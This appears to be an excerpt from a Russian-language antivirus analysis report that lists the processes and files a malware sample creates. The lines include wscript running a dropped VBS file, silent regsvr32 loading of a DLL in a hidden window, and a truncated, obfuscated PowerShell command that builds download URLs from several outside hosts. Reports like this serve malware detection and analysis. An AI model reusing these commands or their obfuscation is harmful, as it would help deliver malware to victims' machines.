Техническая информация
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\bbiwjdf.vbs
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1524
- %ALLUSERSPROFILE%\bbiwjdf.vbs
- %TEMP%\1348425.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$ghkid=('$MJXdfshDrfGZses4=\"http:ufieufieboardingschoolsoftware.comufiebackupufieVC7WKufiebouhttp:ufieufietowardsun.netufieadminufieO29Fjaufiebouhttp:ufieufie47.244.189.73ufiewell-kn...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\regsvr32.exe /s %ALLUSERSPROFILE%\oiphilfj.dll' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$ghkid=('$MJXdfshDrfGZses4=\"http:ufieufieboardingschoolsoftware.comufiebackupufieVC7WKufiebouhttp:ufieufietowardsun.netufieadminufieO29Fjaufiebouhttp:ufieufie47.244.189.73ufiewell-kn...
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\regsvr32.exe /s %ALLUSERSPROFILE%\oiphilfj.dll
- '%WINDIR%\syswow64\regsvr32.exe' /s %ALLUSERSPROFILE%\oiphilfj.dll